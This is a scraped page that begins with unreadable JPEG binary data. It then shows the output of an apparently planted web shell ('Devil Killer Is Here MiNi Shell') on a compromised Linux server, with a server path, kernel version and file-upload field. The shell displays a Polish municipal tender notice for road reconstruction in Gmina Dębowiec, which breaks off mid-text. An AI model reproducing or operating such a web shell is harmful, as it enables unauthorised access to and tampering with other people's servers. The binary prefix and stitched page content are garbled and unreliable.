JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220217/0006095001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych na terenie Gminy Dębowiec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DĘBOWIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440318</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">101</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dębowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(13) 44 13 028</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@debowiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.debowiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych na terenie Gminy Dębowiec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-011c9d39-8ff3-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00060950</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00038159/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa dróg gminnych na terenie Gminy Dębowiec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/debowiec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Strona internetowa prowadzonego postępowania, na której udostępnione będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z prowadzeniem postępowania: https://platformazakupowa.pl/pn/debowiec <br/>Ofertę składa się pod rygorem nieważności, zgodnie z wyborem wykonawcy:<br/>a)	w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>b)	w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>– wyłącznie poprzez platformę zakupową Gminy Dębowiec (adres powyżej).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym <br/>a wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, tj.:<br/>- platformy zakupowej Gminy Dębowiec – https://platformazakupowa.pl/pn/debowiec<br/>Ofertę składa się pod rygorem nieważności, zgodnie z wyborem wykonawcy:<br/>a)	w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>b)	w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>– wyłącznie poprzez platformę zakupową Gminy Dębowiec (adres powyżej).<br/>Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane będą za pośrednictwem platformazakupowa.pl <br/>i formularza „Wyślij wiadomość do zamawiającego”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>Zamawiający zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Oferty, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 Pzp oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 Pzp, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w formie lub w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy <br/>z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, <br/>z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 Pzp, z uwzględnieniem rodzaju przekazywanych danych.<br/>Szczegółowe wymagania opisano w Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, zamawiający informuje, że:<br/>1)	Administratorem danych osobowych jest Gmina Dębowiec / Wójt Gminy Dębowiec, 38-220 Dębowiec 101<br/>2)	Kontakt z inspektorem ochrony danych osobowych w Urzędzie Gminy Debowiec pod adresem: iodo@debowiec.pl , telefon: 13 44 13 028.<br/>3)	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia niniejszego postępowania.<br/>4)	Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 Pzp. <br/>5)	Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6)	Obowiązek podania danych osobowych osoby, której dane dotyczą bezpośrednio przez tą osobę jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp. <br/>7)	W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8)	Osoby, której dane dotyczą posiadają:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych ich dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają, że przetwarzanie danych osobowych ich dotyczących narusza przepisy RODO.<br/>9)	Osobom, których dane dotyczą nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania ich danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">12</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - Przebudowa drogi wewnętrznej dz. nr ewid. 40/4 w Pagórku<br/>Planowana przebudowa drogi obejmuje odcinek o długości około 425 m oraz remont odcinka o długości 30m. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy będzie zmienna i wynosić będzie od 4 m na odcinku 230m, następnie ulegnie stopniowemu przewężeniu do szerokości 3,3 m na odcinku 78m, ostatni odcinek o szerokości 3,3m i długości 117 m.<br/>Przebudowę drogi należy rozpocząć od obustronnego mechanicznego ścięcia zawyżonych poboczy o średniej grubości do 10 cm, na szerokości 0,5 m, wraz z transportem urobku wg uznania Wykonawcy. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 4m w miejscu połączenia z istniejącą nawierzchnią asfaltową. Na początkowym odcinku drogi o długości 100 m zaplanowano uzupełnienie istniejącej warstwy mineralno-asfaltowej mieszanką z kruszyw łamanych 0-31,5 mm o łącznej grubości 8cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości (wraz z poboczami) – 4,5m. Na dalszym odcinku drogi przyjęto miejscowe uzupełnienie ubytków w jezdni mieszanką mineralno-asfaltową o średniej grubości 3 cm.<br/>Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 3 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Szerokość jezdni nie ulegnie zmianie i wynosić będzie od 4 m na początkowym odcinku przebudowywanej drogi, następnie po 230m następuje stopniowe przewężenie jezdni na odcinku 78 m, ostatni odcinek o szerokości 3,3m <br/>i długości 117 m do szerokości 3,3 m. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Obustronne pobocza o szerokości 25 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 7 cm po zagęszczeniu. Istniejące zjazdy w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5mm.<br/>Dodatkowo na odcinku poprzedzającym przebudowywany odcinek drogi zaplanowano miejscowy remont jezdni polegający na wykonaniu nakładki z mieszanek mineralno-bitumicznych na długości 30 m i szerokości 4 m. W zakresie remontu zawiera się frezowanie nawierzchni, ścinanie zawyżonych poboczy, wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną o gr. 3 cm, skropienie nawierzchni drogowej asfaltem, wykonanie nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna o gr. 4 cm) oraz wyprofilowanie poboczy drogowych mieszanką z kruszyw łamanych na szerokości 25 cm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – Przebudowa odcinka drogi wewnętrznej dz. nr ewid. 686 <br/>w Cieklinie (k. Rzońcy)<br/>Planowana przebudowa drogi dz. nr ewid. 686 w Cieklinie obejmuje odcinek o długości 50 m. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,5 m, a szerokość poboczy 20 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego ścięcia poboczy grubości do 10 cm, wraz z wywozem urobku na odległość do 10 km. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 2,5 m w miejscu połączenia z istniejącą nawierzchnią asfaltową. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz <br/>z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 2,9 m. Na tak przygotowanym podłożu zostanie wykonana podbudowa z mieszanki kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm <br/>o łącznej grubości 8cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 2,9m. Dodatkowo w połowie przebudowywanego odcinka zaplanowano poszerzenie istniejącego pobocza na długości 20 m. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno - asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,5m. Obustronne pobocza o szerokości 20 cm oraz zjazdy należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III - Przebudowa odcinków drogi wewnętrznej dz. nr ewid. 3827 oraz 3834 w Cieklinie<br/>Planowana przebudowa drogi dz. nr ewid. 3827 oraz nr ewid. 3834 w Cieklinie obejmuje odcinek o długości 657 m wraz z rozjazdami przy drogach gminnych. Szerokość jezdni <br/>z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,7 m, a szerokość poboczy 25 cm.<br/>Przebudowę drogi należy rozpocząć od mechanicznego ścięcia poboczy grubości do 20 cm, wraz z wywozem urobku na odległość do 10 km. Następnie należy wykonać frezowanie nawierzchni bitumicznej na szerokości 12,2 m w miejscach połączenia z istniejącą nawierzchnią asfaltową. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 3,2 m, z uwzględnieniem rozebrania warstwy gruntowej na środku jezdni na odcinku 447 m. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm <br/>o grubości: 8 cm po zagęszczeniu na całym odcinku drogi tj. 657 m, oraz dodatkowa warstwa utwardzenia o grubości 7 cm na odcinku o długości 447 m. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 3,2 m wraz z rozjazdami. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do 